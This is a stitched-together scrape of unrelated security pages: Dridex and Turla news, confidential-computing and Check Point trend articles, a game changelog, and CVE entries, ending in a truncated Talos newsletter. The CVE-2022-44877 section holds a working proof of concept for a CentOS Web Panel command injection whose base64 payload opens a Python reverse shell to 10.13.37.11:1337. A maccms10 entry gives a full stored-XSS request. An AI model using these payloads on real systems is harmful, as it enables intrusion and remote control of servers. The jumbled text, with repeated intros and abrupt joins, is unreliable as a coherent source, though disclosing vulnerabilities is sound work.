A variant of the infamous Dridex banking malware has set its sights on Apple's macOS operating system using a previously undocumented infection method, according to latest research.
It has "adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files," Trend Micro researcher Armando Nathaniel

A variant of the infamous Dridex banking malware has set its sights on Apple's macOS operating system using a previously undocumented infection method, according to latest research.

It has "adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files," Trend Micro researcher Armando Nathaniel Pedragoza said in a technical report.

Dridex, also called Bugat and Cridex, is an information stealer that's known to harvest sensitive data from infected machines and deliver and execute malicious modules. It's attributed to an e-crime group known as Evil Corp (aka Indrik Spider).

The malware is also considered to be a successor of Gameover Zeus, itself a follow-up to another banking trojan called Zeus. Previous Dridex campaigns targeting Windows have leveraged macro-enabled Microsoft Excel documents sent via phishing emails to deploy the payload.

Trend Micro's analysis of the Dridex samples involves a Mach-O executable file, the earliest of which was submitted to VirusTotal in April 2019. Since then, 67 more artifacts have been detected in the wild, some as recent as December 2022.

The artifact, for its part, contains a malicious embedded document – first detected way back in 2015 – that incorporates an Auto-Open macro that's automatically run upon opening the document.

This is achieved by overwriting all ".doc" files in the current user directory (~/User/{user name}) with the malicious code extracted from the Mach-O executable in the form of a hexadecimal dump.

"While the macro feature in Microsoft Word is disabled by default, the malware will overwrite all the document files for the current user, including the clean files," Pedragoza explained. "This makes it more difficult for the user to determine whether the file is malicious since it doesn't come from an external source."

The macros included in the overwritten document are engineered to contact a remote server to retrieve additional files, which includes a Windows executable file that will not run in macOS, indicating that the attack chain is a work in progress. The binary, in turn, attempts to download the Dridex loader onto the compromised machine.

While documents containing booby-trapped macros are typically delivered via social engineering attacks, the findings once again show that Microsoft's decision to block macros by default has prompted threat actors to refine their tactics and find more efficient methods of entry.

"Currently, the impact on macOS users for this Dridex variant is minimized since the payload is an exe file (and therefore not compatible with MacOS environments)," Trend Micro said. "However, it still overwrites document files which are now the carriers of Dridex's malicious macros."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Dridex Malware Now Attacking macOS Systems with Novel Infection Method

A vulnerability was found in Forged Alliance Forever up to 3746. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Vote Handler. The manipulation leads to improper authorization. Upgrading to version 3747 is able to address this issue. The name of the patch is 6880971bd3d73d942384aff62d53058c206ce644. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217555.

**Features**

*   (#4377, #4380) Improve reclaim overview  
    Adjusts the colors, scaling and depth to better represent what is valuable.
    
*   (#4387) Add toggle to enable / disable always showing splash damage  
    It is off by default, you can find the toggle in the game options -> interface -> cursor features
    
*   (#4393) Paint feature for observers  
    Observers can now paint on the map and other observers can view each others paintings. Useful for  
    casting to communicate to your viewers and fellow casters.
    
    Works by pressing the ALT key, can be adjusted in the game options.
    
    This feature also works in replays.
    
*   (#4391) Improve rendering quality of water  
    Slightly adjusts how water looks like in-game to make it look better overall
    
*   (#4390, #4409) Add in missing tooltips for game options  
    All the game options should now have a consistent tooltip.
    
*   (#4385) Change default aix multiplier values  
    Especially the AIs that can be found in the vault become complete beasts when they have  
    twice the resources and build time. The default multiplier is now set to 1.5
    
    Note that you can change the AI multipliers in the lobby options
    
*   (#4406) Prefetch session and unit assets  
    Decreases the loading time when launching through the lobby. Assets of units are loaded  
    as you play to reduce stuttering of the game.
    
    This is an experimental change.
    
*   (#4405) Tweak network parameters  
    Reduce the amount of lag that players experience by reducing the delay when messages are send.
    
    This is an experimental change.
    

**Bug fixes**

*   (#4379) Fix weapon priorities not working for units that can snipe
    
*   (#4367) Fix the UEF factory unit build animations
    
*   (#4367) Fix the cheat window build preview hanging around
    
*   (#4370) Fix the resource sharing panel  
    The 'resources' button is now available again in the diplomacy panel
    
*   (#4306) Fix SubtractCurrentEngineer and formatting in base manager
    
*   (#4388) Revert accidental footprint changes of Titan, Loya and Ilsa
    
*   (#4375) Fix TMDs trying to shoot down missiles that are too nearby  
    They now have a minimal firing range, it prevents them from trying to hit missiles  
    that they can't find a firing solution regardless
    
*   (#4398) Fix and update recall feature  
    In particular, fixes a few glitches that people could apply to influence the results.
    
*   (#4407) Scenario Framework GetRandomEntry fix
    
*   (#4408) Slightly reduce mods manager size  
    Fixes the overlap of the last mod in the list with the search bar
    

**Other changes**

*   (#4366) Add slight transparent background to changelog
    
*   (#4369) Add guard for validation of LayoutHelpers  
    It would otherwise spam the logs, causing a delay
    

**Contributors**

*   ErikMekkes (#4379)
*   Relent0r (#4385)
*   BlackYps (#4391)
*   4z0t (#4306, #4407)
*   Hdt80bro (#4377, #4370, #4369, #4398, #4409)
*   Jip (#4348, #4367, #4366, #4380, #4387, #4389, #4393, #4390, #4406, #4405, #4408, #4375, #4388)

CVE-2022-4879: Release Game version 3747 · FAForever/fa

A vulnerability, which was classified as critical, was found in Seiji42 cub-scout-tracker. This affects an unknown part of the file databaseAccessFunctions.js. The manipulation leads to sql injection. The name of the patch is b4bc1a328b1f59437db159f9d136d9ed15707e31. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217551.

@@ -20,69 +20,79 @@ function hashPassword(password) return hash; }  
function selectAdult(username, connection) function insertAdult(firstName, lastName, username, password, packNumber, leaderType, rankType, phoneNumber, connection) { var strQuery \= "SELECT \* FROM adult WHERE username= '" +connection.escape(username)+"'"; var temp\= selectAdult(username, connection);  
if(temp.databaseObject.adult\_id<1) { return temp; } var strQuery \= "INSERT INTO adult VALUES('"+ connection.escape(firstName) +"', '"+ connection.escape(lastName) +"', '"+ connection.escape(username) +"', '"+ connection.escape(hashPassword(password)) +"', '"+ connection.escape(packNumber) +"', '"+ connection.escape(leaderType) +"', '"+ connection.escape(rankType) +"', '"+ connection.escape(phoneNumber) +"', 'NULL')";  
connection.query( strQuery, function(err, rows) {if(err) { throw err; }else{ temp\= rows\[0\]; temp.password\=""; temp\= new Adult(row\[0\]); if(debug) {console.log("SelectAdult \\n"+rows\[0\]+"\\n");} return temp; {console.log("insertAdult \\n"+rows\[0\]+"\\n");}  
return addScoutsToParent(temp); } }); }  
function validateAdult(username, password, connection) function selectAdult(username, connection) { var strQuery \= "SELECT \* FROM adult WHERE username= '" +connection.escape(username)+"'" +"AND password= '" + hashPassword(password)+"'"; var strQuery \= "SELECT \* FROM adult WHERE username= '" +connection.escape(username)+"'";  
connection.query( strQuery, function(err, rows) {if(err) { throw err; }else{ temp\= rows\[0\]; temp.password\="";  
if(debug) {console.log("validateAdult \\n"+rows\[0\]+"\\n");} {console.log("SelectAdult \\n"+rows\[0\]+"\\n");}  
return temp; } }); }  
function insertAdult(firstName, lastName, username, password, packNumber, leaderType, rankType, phoneNumber, connection) function validateAdult(username, password, connection) { var temp\= selectAdult(username, connection); var strQuery \= "SELECT \* FROM adult WHERE username= '" + connection.escape(username)+"'" +"AND password= '" + connection.escape(hashPassword(password))+"'";  
if(temp.databaseObject.adult\_id<1) { return temp; } var strQuery \= "INSERT INTO adult VALUES('"+firstName+"', '"+lastName+"', '"+ username + "', '" +hashPassword(password) + "', '" + packNumber+"', '"+ leaderType +"', '"+ rankType+"', '"+phoneNumber+ "', 'NULL')"; connection.query( strQuery, function(err, rows) {if(err) { throw err; }else{ temp\= new Adult(row\[0\]); temp\= rows\[0\]; temp.password\="";  
if(debug) {console.log("insertAdult \\n"+rows\[0\]+"\\n");} return addScoutsToParent(temp); {console.log("validateAdult \\n"+rows\[0\]+"\\n");}  
return temp; } }); }  
  
  
function updateAdult(firstName, lastName, username, password, packNumber, leaderType, rankType, phoneNumber,adultID, connection) { @@ -94,26 +104,37 @@ function updateAdult(firstName, lastName, username, password, packNumber, leaderType, rankType, phoneNumber,\-1); return temp; } var strQuery \= "UPDATE adult SET first\_name="+firstName+", last\_name="+lastName+", username="+ username + ", password=" +hashPassword(password) + ", pack\_number=" + packNumber+", leader\_type="+ leaderType +", rank\_type="+ rankType+", phone\_number="+phoneNumber+ "WHERE adult\_id="+id; var strQuery \= "UPDATE adult SET "+ "first\_name=" +connection.escape(firstName) + ", last\_name=" +connection.escape(lastName) + ", username=" +connection.escape(username) + ", password=" +connection.escape(hashPassword(password))+ ", pack\_number=" +connection.escape(packNumber) + ", leader\_type=" +connection.escape(leaderType) + ", rank\_type=" +connection.escape(rankType) + ", phone\_number="+connection.escape(phoneNumber) + "WHERE adult\_id="+connection.escape(id); connection.query( strQuery, function(err, rows) {if(err) { throw err; }else{ temp\= new Adult(row\[0\]); if(debug) {console.log("UpdateAdult \\n"+rows\[0\]+"\\n");}  
return addScoutsToParent(temp); } }); }  
function insertAchievement(name, description, categoryID, numElectives, connection) { var strQuery \= "INSERT INTO achievement VALUES('"+name+"', '" + description + "', '" + categoryID +"', '"+ numElectives+ "', 'NULL')"; var strQuery \= "INSERT INTO achievement VALUES('"+ connection.escape(name) +"', '"+ connection.escape(description) +"', '"+ connection.escape(categoryID) +"', '"+ connection.escape(numElectives) +"', 'NULL')";  
connection.query( strQuery, function(err, rows) {if(err) { throw err; @@ -127,8 +148,12 @@ function insertAchievement(name, description, categoryID, numElectives, connecti  
function insertCategory(name, description, rankID, numAchievments, connection) { var strQuery \= "INSERT INTO category VALUES('"+name+"', '" + description + "', '" + rankID+"', '"+numAchievments+ "', 'NULL')"; var strQuery \= "INSERT INTO category VALUES('"+ connection.escape(name) +"', '"+ connection.escape(description) +"', '"+ connection.escape(rankID) +"', '"+ connection.escape(numAchievments) +"', 'NULL')";  
connection.query( strQuery, function(err, rows) {if(err) { throw err; @@ -142,7 +167,9 @@ function insertCategory(name, description, rankID, numAchievments, connection)  
function insertRank(name, description, connection) { var strQuery \= "INSERT INTO rank VALUES('"+name+"', '" + description + "', 'NULL')"; var strQuery \= "INSERT INTO rank VALUES('"+ connection.escape(name) +"', '"+ connection.escape(description) +"', 'NULL')";  
connection.query( strQuery, function(err, rows) {if(err) { @@ -158,8 +185,11 @@ function insertRank(name, description, connection) function insertRecord(recordRankType, dateDone,requirementID, scoutID, connection) { var strQuery \= "INSERT INTO record VALUES('"+recordRankType+"', '" + dateDone + "', '" +requirementID+"', '"+scoutID+"', 'NULL')"; var strQuery \= "INSERT INTO record VALUES('"+ connection.escape(recordRankType) +"', '"+ connection.escape(dateDone) +"', '"+ connection.escape(requirementID) +"', '"+ connection.escape(scoutID) +"', 'NULL')";  
connection.query( strQuery, function(err, rows) {if(err) { @@ -174,8 +204,12 @@ function insertRecord(recordRankType, dateDone,requirementID,  
function insertRequirement(name, description, achievementID, reqElec, connection) { var strQuery \= "INSERT INTO requirement VALUES('"+name+"', '" + description + "', '" + achievementID+"', '"+reqElec+ "', 'NULL')"; var strQuery \= "INSERT INTO requirement VALUES('"+ connection.escape(name) +"', '" + connection.escape(description) +"', '" + connection.escape(achievementID) +"', '"+ connection.escape(reqElec) +"', 'NULL')";  
connection.query( strQuery, function(err, rows) {if(err) { throw err; @@ -190,8 +224,15 @@ function insertRequirement(name, description, achievementID, reqElec, connection function insertScout(firstName, lastName, birthDate, packNumber, rankType, parentID, leaderID, connection) { var strQuery \= "INSERT INTO scout VALUES('"+firstName+"', '" +lastName+"', '"+ birthDate + "', '" + packNumber + "', '"+ rankType+"', '"+parentID+", "+leaderID+"', 'NULL')"; var strQuery \= "INSERT INTO scout VALUES('"+ connection.escape(firstName) +"', '"+ connection.escape(lastName) +"', '"+ connection.escape(birthDate) +"', '"+ connection.escape(packNumber) +"', '"+ connection.escape(rankType) +"', '"+ connection.escape(parentID) +"', '"+ connection.escape(leaderID) +"', 'NULL')";  
connection.query( strQuery, function(err, rows) {if(err) { throw err; @@ -204,11 +245,17 @@ function insertScout(firstName, lastName, birthDate, }  
function updateScout(firstName, lastName, birthDate,packNumber, rankType, parentID, leaderID, scoutID, connection) rankType, parentID, leaderID, scoutID, connection) { var strQuery \= "UPDATE scout SET first\_name="+firstName+", last\_name="+lastName+", birth\_date="+ + ", pack\_number=" + + ", rank\_type=" + packNumber+", parent\_id="+ leaderType +", leader\_id="+ rankType+" WHERE scout\_id="+id; var strQuery \= "UPDATE scout SET "+ "first\_name=" +connection.escape(firstName) + ", last\_name=" +connection.escape(lastName) + ", birth\_date=" +connection.escape(birthdate) + ", pack\_number=" +connection.escape(packNumber) + ", rank\_type=" + connection.escape(rankType) + ", parent\_id=" +connection.escape(parentID) + ", leader\_id=" + connection.escape(leaderID) + " WHERE scout\_id="+connection.escape(id); connection.query( strQuery, function(err, rows) {if(err) { throw err; @@ -222,7 +269,7 @@ function updateScout(firstName, lastName, birthDate,packNumber,  
function addScoutsToParent(adult, connection) { var strQuery \= "SELECT \* FROM scout WHERE parent\_id= '" +adult.rowID+"'"; var strQuery \= "SELECT \* FROM scout WHERE parent\_id= '" +connection.escape(adult.rowID)+"'";  
connection.query( strQuery, function(err, rows) {if(err) {

CVE-2014-125046: Added protection from sql injection and dubug flag · Seiji42/cub-scout-tracker@b4bc1a3

A reflected cross-site scripting (XSS) vulnerability in maccms10 v2022.1000.3032 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the AD Management module.

**CVE-2022-44870**

maccms admin+ xss attacks

Overview

Manufacturer's website information：https://maccms.pro

Source code download address ： https://github.com/maccmspro/maccms10.git

1.  Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#23

Go to background, go to Basics > AD Management > Name,

Insert payload1 in the name box:

It can cause XSS attacks.

Vulnerability name：Storage type xss

Vulnerability level：Medium risk

Vulnerability location： Advertising management-->name

Insert <script>alert(1)</script> at cat\_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

3.Recurring vulnerabilities and POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: _/_

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat\_id=&cat\_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat\_code=111

CVE-2022-44870: CVE-2022-44870/README.md at main · Cedric1314/CVE-2022-44870

RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.

\# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

\[+\] Centos Web Panel 7 Unauthenticated Remote Code Execution

\[+\] Centos Web Panel 7 - < 0.9.8.1147

\[+\] Affected Component ip:2031/login/index.php?login=$(whoami)

\[+\] Discoverer: Numan Türle @ Gais Cyber Security

\[+\] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194

\## Proof of concept:

POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1

Host: 10.13.37.10:2031

Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82

Content-Length: 40

Origin: https://10.13.37.10:2031

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://10.13.37.10:2031/login/index.php?login=failed

Accept-Encoding: gzip, deflate

Accept-Language: en

Connection: close

username=root&password=toor&commit=Login

\## Solution

Upgrade to CWP7 current version.

CVE-2022-44877: # Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

Encrypting data while in use, not just in transit and at rest, closes one more avenue of cyberattack.

Digital transformation initiatives, spurred by COVID-19, are helping companies scale new heights in efficiency and productivity. However, they have also highlighted to enterprise leaders the need for tighter cybersecurity measures — especially as attackers continue to ride the wave of new technologies to launch sophisticated attacks. The number of records exposed in data breaches consistently went up throughout 2022 — 3.33 million records in the first quarter of 2022, 5.54 million records in the second quarter, and 14.78 million records in the third quarter — according to data from Statista.

Organizations face various challenges as they grapple with managing and securing the explosion of data created, in part, by remote environments. This, coupled with the lack of visibility across dispersed networks and growing migration to the cloud, has increased the risk of attacks across multiple industries, including healthcare, financial services, and decentralized finance (DeFi).

Confidential computing segregates data and code from the host computer's system and makes it harder for unauthorized third parties to access the data. The way that confidential computing protects sensitive data could smooth the way for increased cloud adoption in highly regulated sectors such as finance and healthcare, according to Gartner.

As more organizations handle large volumes of data, ushering in a greater need for privacy and data security, confidential computing is poised to close that security gap by ensuring data remains confidential at all times — while at rest, in transit, and in use.

**A Different Approach to Cybersecurity**

Most encryption schemes focus on protecting while at rest, or while in transit. Confidential computing protects data while in use — by allowing data to remain encrypted even as it’s being processed and used in applications. The market for confidential computing is expected to grow up to $54 billion by 2026, according to a report by Everest Group.

"Everybody wants to continue to reduce the attack surface of data. Up to this point, it is obviously encrypted in transit and at rest. Confidential computing solves the encrypted in-use at the infrastructure level," said Justin Boitano, vice president and general manager of Nvidia's enterprise and edge computing operations, in a previous article on Dark Reading.

Anil Rao, vice president and general manager for systems architecture and engineering at Intel's office of the chief technology officer, also noted in the article that confidential computing will also help enterprises build a new class of applications where third-party data sets can mingle with proprietary data sets in a secure area to create better learning models.

The hardware element of confidential computing makes it uniquely secure, says Jay Harel, VP of product at Opaque Systems. "A hacker must literally crack the CPU open and tap into the silicon die in order to steal any confidential data," Harel says. "Most data breaches happen remotely, over the Internet. Confidential computing requires physical access to the hardware, making a breach much less likely."

Cloud vendors Microsoft Azure and Google Cloud make confidential computing available through CPUs from Intel and AMD, while Amazon AWS uses its own Nitro technology. "I wouldn't say that the hardware is fully mainstream yet, as most compute resources offered by these vendors still don't have confidential computing capabilities," Harel notes.

As Noam Dror, senior vice president of solution engineering at Hub Security, puts it, "Today, when hackers get past standard security controls, they can access data in use which is totally exposed and unencrypted. Existing cybersecurity measures have a hard time dealing with these issues. This is where confidential computing comes in, providing comprehensive cyber protection across all levels. These most sensitive data must be protected leveraging confidential computing because the computing environment will always be vulnerable."

**Helps Industries Share Data Securely**

The confidential computing approach to cybersecurity offers several advantages, particularly in sectors where client or patient data is highly sensitive and regulated — like the healthcare sector, for example. In such sectors, confidential computing can enable secure multiparty training of AI for different purposes and ensure data privacy.

Cloud security company Fortanix says that financial services in particular should invest in confidential computing, for several reasons: it involves masses of personally identifiable information (PII), it is heavily regulated, its monetary value attracts attention from cyber criminals, and "it's an industry that hasn't figured out a secure way to share valuable data among each other that can be used to detect fraud or money laundering," a Fortanix spokesperson says. Fortanix adds it is also seeing interest in confidential computing from industries with similar characteristics, such as healthcare enterprises and government entities.

"Confidential computing reduces the trusted computing base to the minimum. It takes the trust away from configuration files, and secrets and passwords managed by humans, which can be error-prone. The trust circle is reduced to the CPU, and the application, and everything in between — the operating system, the network, the administrators, can be removed from that trust circle. Confidential computing gets closest to achieving zero trust when establishing communication between app-to-app or machine-to-machine," Fortanix says.

**Complete Control Over Data**

Today's protective solutions are insufficient and leave critical data exposed. Cloud providers AMD, Intel, Google Cloud, Microsoft Azure, Amazon Web Services, Red Hat, and IBM have already deployed confidential computing offerings. A growing number of cybersecurity companies, including Fortinet, Anjuna Security, Gradient Flow, and Hub Security, are also providing such solutions.

Harel says, "Confidential computing is a natural addition to their security arsenal, allowing them to evolve their breach defense and take it to the next level. It allows them to finally protect data in use, after spending decades and billions of dollars protecting data at rest and in transit."

Nataraj Nagaratnam, IBM distinguished engineer and CTO for cloud security, believes that confidential computing is a game-changer, especially because it gives customers complete control of their data. "Confidential computing primarily aims to provide greater assurance to companies that their data in the cloud is protected and confidential. It encourages companies to move more of their sensitive data and computing workloads to public cloud services," he notes.

How Confidential Computing Can Change Cybersecurity

Check Point Research (CPR) releases new data on 2022 cyberattack trends. The data is segmented by global volume, industry and geography. Global cyberattacks increased by 38% in 2022, compared to 2021. These cyberattack numbers were driven by smaller, more agile hacker and ransomware gangs, who focused on exploiting collaboration tools used in work-from-home environments, targeting of education institutions that shifted to e-learning post COVID-19. This increase in global cyberattacks also stems from hacker interest in healthcare organizations, which saw the largest increase in cyberattacks in 2022, when compared to all other industries. CPR warns that the maturity of AI technology, such as CHATGPT, can accelerate the number of cyberattacks in 2023. 

Check Point Research (CPR) has released new data on last year’s cyberattack trends. The data is segmented by global volume, industries, continents and countries.

**Key Statistics:** 

*   Global volume of cyberattacks reached an all-time high in Q4 with an average of 1168 weekly attacks per organization
*   Top 3 most attacked industries in 2022 were Education/Research, Government and Healthcare
*   Geography of Africa experienced the highest volume of attacks with 1875 weekly attacks per organization, followed by APAC with 1691 weekly attacks per organization
*   North America (+52%), Latin America (+29%) and Europe (+26%) showed largest increases in cyberattacks in 2022, compared to 2021
*   USA saw a 57% increase in overall cyberattacks in 2022, UK saw a 77% increase and Singapore saw a 26% increase

Cyberattacks are increasing world-wide, with 38% more cyberattacks per week on corporate networks in 2022, compared to 2021. Several cyber threat trends are all happening at once.

For one, the ransomware ecosystem is continuing to evolve and grow with smaller, more agile criminal groups that form to evade law enforcement. Second, hackers are widening their aim to target business collaboration tools such as Slack, Teams, OneDrive and Google Drive with phishing exploits. These make for a rich source of sensitive data given that most organizations’ employees continue to work remotely.

Third, academic institutions have become a popular feeding ground for cybercriminals following the rapid digitization they undertook in response to the COVID-19 pandemic. In fact, the education/research sector was the number one most attacked industry globally, seeing a 43% increase in 2022 compared to 2021, with an average of 2,314 attacks per organisation every week. Many education institutions have been ill-prepared for the unexpected shift to online learning, creating ample opportunity for hackers to infiltrate networks through any means necessary. Schools and universities also have the unique challenge of dealing with children or young adults, many of which use their own devices, work from shared locations, and often connect to public WiFi without thinking of the security implications.

Looking back at cyberattacks for the healthcare sector in 2022, healthcare organizations in the US suffered an average of 1410 weekly cyberattacks per organization, which is 86% higher than the number we saw in 2021, with the healthcare sector ranking second out of all sectors for the most cyberattacks in the US.

Hackers like to target hospitals because they perceive them as short on cyber security resources with smaller hospitals particularly vulnerable, as they are underfunded and understaffed to handle a sophisticated cyberattack.

The healthcare sector is so lucrative to hackers as they aim to retrieve health insurance information, medical records numbers and, sometimes, even social security numbers with direct threats from ransomware gangs to patients, demanding payment under threats of having patient records released. Ransomware gangs also find the attention gained from attacking a hospital as an attractive plus-point for their notoriety.

Unfortunately, we expect the increase in cyberattack activity to only increase. With AI technologies such as ChatGPT readily available to the public, it is possible for hackers to generate malicious code and emails at a faster, more automated pace.

To protect yourself, it is imperative to think about prevention first, not detection. There are several best practices and actions an organization can take to minimize their exposure to the next attack or breach, such as cyber security training, keeping patches up-to-date and implementing anti-ransomware technology.”

**Cyber Safety Tips:** 

1.  **Cyber Awareness Training**: Frequent cybersecurity awareness training is crucial to protecting the organization against ransomware. This training should instruct employees to do the following:
    1.  Not click on malicious links
    2.  Never open unexpected or untrusted attachments
    3.  Avoid revealing personal or sensitive data to phishers
    4.  Verify software legitimacy before downloading it
    5.  Never plug an unknown USB into their computer
    6.  Use a VPN when connecting via untrusted or public Wi-Fi
2.  **Up-to-Date Patches:** Keeping computers and servers up-to-date and applying security patches, especially those labeled as critical, can help to limit an organization’s vulnerability to ransomware attacks.
3.  **Keep your software updated.** Ransomware attackers sometimes find an entry point within your apps and software, noting vulnerabilities and capitalizing on them. Fortunately, some developers are actively searching for new vulnerabilities and patching them out. If you want to make use of these patches, you need to have a patch management strategy in place—and you need to make sure all your team members are constantly up to date with the latest versions.
4.  **Choose Prevention over detection:** Many claim that attacks will happen, and there is no way to avoid them, and therefore the only thing left to do is to invest in technologies that detect the attack once it has already breached the network and mitigate the damage as soon as possible. This is not true. Not only can attacks be blocked, but they can be prevented, including zero-day attacks and unknown malware. With the right technologies in place, most attacks, even the most advanced ones, can be prevented without disrupting the normal business flow.

Check Point Research Reports a 38% Increase In 2022 Global Cyberattacks

The infamous, FSB-connected Turla group took over other hackers' servers, exploiting their USB drive malware for targeted espionage.

The Russian cyberespionage group known as Turla became infamous in 2008 as the hackers behind agent.btz, a virulent piece of malware that spread through US Department of Defense systems, gaining widespread access via infected USB drives plugged in by unsuspecting Pentagon staffers. Now, 15 years later, the same group appears to be trying a new twist on that trick: hijacking the USB infections of _other_ hackers to piggyback on their infections and stealthily choose their spying targets.

Today, cybersecurity firm Mandiant revealed that it has found an incident in which, it says, Turla's hackers—widely believed to work in the service of Russia’s FSB intelligence agency—gained access to victim networks by registering the expired domains of nearly decade-old cybercriminal malware that spread via infected USB drives. As a result, Turla was able to take over the command-and-control servers for that malware, hermit-crab style, and sift through its victims to find ones worthy of espionage targeting.

That hijacking technique appears designed to let Turla stay undetected, hiding inside other hackers’ footprints while combing through a vast collection of networks. And it shows how the Russian group’s methods have evolved and become far more sophisticated over the past decade and a half, says John Hultquist, who leads intelligence analysis at Mandiant. “Because the malware already proliferated through USB, Turla can leverage that without exposing themselves. Rather than use their own USB tools like agent.btz, they can sit on someone else’s,” Hultquist says. “They’re piggybacking on other people’s operations. It’s a really clever way of doing business.”

Mandiant’s discovery of Turla’s new technique first came to light in September of last year, when the company’s incident responders found a curious breach of a network in Ukraine, a country that’s become a primary focus of all Kremlin intel services after Russia’s catastrophic invasion last February. Several computers on that network had been infected after someone inserted a USB drive into one of their ports and double-clicked on a malicious file on the drive that had been disguised as a folder, installing a piece of malware called Andromeda.

Andromeda is a relatively common banking trojan that cybercriminals have used to steal victims’ credentials since as early as 2013. But on one of the infected machines, Mandiant’s analysts saw that the Andromeda sample had quietly downloaded two other, more interesting pieces of malware. The first, a reconnaissance tool called Kopiluwak, has been previously used by Turla; the second piece of malware, a backdoor known as Quietcanary that compressed and siphoned carefully selected data off the target computer, has been used exclusively by Turla in the past. “That was a red flag for us,” says Mandiant threat intelligence analyst Gabby Roncone.

When Mandiant looked at the command-and-control servers for the Andromeda malware that had started that infection chain, its analysts saw that the domain used to control the Andromeda sample—whose name was a vulgar taunt of the antivirus industry—had actually expired and been reregistered in early 2022. Looking at other Andromeda samples and their command-and-control domains, Mandiant saw that at least two more expired domains had been reregistered. In total, those domains connected to hundreds of Andromeda infections, all of which Turla could sort through to find subjects worthy of their spying.

“By doing this you can basically lay under the radar much better. You’re not spamming a bunch of people, you’re letting someone else spam a bunch of people,” says Hultquist. “Then you started picking and choosing which targets are worth your time and your exposure.”

In fact, Mandiant only found that single instance in Ukraine of the hijacked Andromeda infection distributing Turla’s malware. But the company suspects that there were likely more. Hultquist warns there’s no reason to believe the stealthy targeted spying that piggybacked off Andromeda’s USB infections would be limited to just one target, or even to just Ukraine. “Turla has a global intelligence collection mandate,” he says.

Turla has a long history of using clever tricks to hide the control of its malware, and even to hijack the control of other hackers, as Mandiant saw in this most recent case. Cybersecurity firm Kaspersky revealed in 2015 that Turla had taken control of satellite internet connections to obscure the location of its command-and-control servers. In 2019, Britain’s GCHQ intelligence agency warned that Turla had silently commandeered Iranian hackers’ servers to conceal themselves and confuse detectives trying to identify them.

Those innovative techniques have made the group a particular obsession for many cybersecurity researchers, who have traced its fingerprints all the way back to Moonlight Maze, one of the first-ever state-sponsored hacking campaigns, discovered in the late 1990s. Turla’s agent.btz thumbdrive malware represented another historic moment for the group: It resulted in a Pentagon initiative called Operation Buckshot Yankee, designed to vastly upgrade the Defense Department’s cybersecurity after the group’s embarrassing USB-based breach.

Mandiant’s discovery of another, stealthier USB-based hacking technique in Turla’s hands should serve as a reminder that even now, 15 years later, that USB-based intrusion vector has hardly disappeared. Plug an infected drive into your USB port today, it seems, and you may be offering an invitation to not only undiscerning cybercriminals, but also a far more sophisticated breed of operative hiding behind them.

Turla, a Russian Espionage Group, Piggybacked on Other Hackers' USB Infections

Happy New Year and welcoem to this week's edition of the Threat Source newsletter. 
We can’t tell if it’s the fog from Lurene’s deadly eggnog or dare we say pure rest and relaxation but we’re still digging out of our

Thursday, January 5, 2023 14:01

Happy New Year and welcome to this week's edition of the Threat Source newsletter.

We can’t tell if it’s the fog from Lurene’s deadly eggnog or dare we say pure rest and relaxation but we’re still digging out of our inboxes, trying to remember logins, and circle back on all the things we prolonged into 2023. With that we’re keeping this week’s newsletter light as we all ease back into the flow of things.

**The one big thing**

Last month Talos released our Year in Review report, a comprehensive report covering Talos’ work for the 2022 year. The initial report launched December 14th with an additional Ukraine Topic Summary Report on the same day. To discuss the initial report and Ukraine section Talos held a livestream with key contributors to the report, which can be viewed here.

**Why do I care?**

